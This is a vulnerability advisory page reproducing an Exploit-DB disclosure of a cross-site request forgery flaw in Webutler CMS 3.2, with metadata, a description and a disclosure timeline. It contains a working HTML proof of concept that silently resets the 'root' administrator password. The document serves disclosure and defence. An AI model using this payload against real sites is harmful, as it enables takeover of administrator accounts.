Webutler CMS Cross-Site Request Forgery

vendor:

Webutler CMS

by:

Keerati T.

8,8

CVSS

HIGH

Cross-Site Request Forgery

352

CWE

Product Name: Webutler CMS

Affected Version From: 3.2

Affected Version To: 3.2

Patch Exists: NO

Related CWE: N/A

CPE: a:webutler:webutler

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Linux

2016

Webutler CMS Cross-Site Request Forgery

The Webutler is a simple online page editor for static HTML files. Webmasters can provide a simple login option for image and text editing to their customers. The Webutler is a tool for websites or projects to be implemented with a small effort. The project has grown over the years and now you can do a lot of things with it. The all of administrative function allow any users to perform HTTP request without verify the request. This exploit can be performed while the logged on user (administrator) visit malicious web page that embedded HTML form.

Mitigation:

Implement proper authentication and authorization checks for all HTTP requests.

Source

Exploit-DB raw data:

Dear OffSec,

Here is the vulnerability detail as I submitted

*# Exploit Title: Webutler CMS Cross-Site Request Forgery*
*# Date: 18 April 2016*
*# Exploit Author: Keerati T. (Post)*
*# Vendor Homepage: http://webutler.de/en <http://webutler.de/en>*
*# Software Link: http://webutler.de/download/webutler_v3.2.zip
<http://webutler.de/download/webutler_v3.2.zip>*
*# Version: 3.2*
*# Tested on: Linux*

*1.Description*
The Webutler is a simple online page editor for static HTML files.
Webmasters can provide a simple login option for image and text editing to
their customers. The Webutler is a tool for websites or projects to be
implemented with a small effort. The project has grown over the years and
now you can do a lot of things with it.
The all of administrative function allow any users to perform HTTP request
without verify the request. This exploit can be performed while the logged
on user (administrator) visit malicious web page that embedded HTML form.


*2. Proof of Concept*
Only change password function PoC, But other function (add page, delete
page, etc..) can be exploited.

<html>
  <body>
    <form action="http://10.0.0.102/webutler/admin/system/save.php"
method="POST">
      <input type="hidden" name="saveuser" value="1" />
      <!-- administrator user name is "root" -->
      <input type="hidden" name="username" value="root" />
      <input type="hidden" name="userpass1" value="111111" />
      <input type="hidden" name="userpass2" value="111111" />
      <input type="hidden" name="userlang" value="en" />
    </form>
  </body>
  <script>document.forms[0].submit();</script>
</html>


*3. Timeline*
11 Apr 2016 - Vulnerability discover.
11 Apr 2016 - No main contact available on vendor web page. Ask related
contact that shown on vendor web page instead.
18 Apr 2016 - No response from related contact and vulnerability disclosed.